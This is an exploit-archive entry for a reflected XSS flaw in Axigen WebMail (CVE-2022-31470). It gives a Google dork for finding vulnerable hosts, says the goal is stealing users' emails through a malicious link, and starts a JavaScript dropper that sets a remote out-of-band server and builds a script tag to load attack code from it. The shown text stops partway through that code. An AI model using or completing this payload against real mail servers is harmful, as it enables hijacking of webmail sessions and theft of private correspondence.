Exploits / Vulnerability Discovered : 2023-09-08 |
Type : webapps |
Platform : multiple
This exploit / vulnerability Axigen < 10.3.3.47, 10.2.3.12 reflected xss is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Axigen < 10.3.3.47, 10.2.3.12 - Reflected XSS
# Google Dork: inurl:passwordexpired=yes
# Date: 2023-08-21
# Exploit Author: AmirZargham
# Vendor Homepage: https://www.axigen.com/
# Software Link: https://www.axigen.com/mail-server/download/
# Version: (10.5.0–4370c946) and older version of Axigen WebMail
# Tested on: firefox,chrome
# CVE: CVE-2022-31470
Exploit
We use the second Reflected XSS to exploit this vulnerability, create a
malicious link, and steal user emails.
Dropper code
This dropper code, loads and executes JavaScript exploit code from a remote
server.
xhr1 = new XMLHttpRequest(), xhr2 = new XMLHttpRequest(), xhr3 = new
XMLHttpRequest();
oob_server = 'https://example.com/';
var script_tag = document.createElement('script');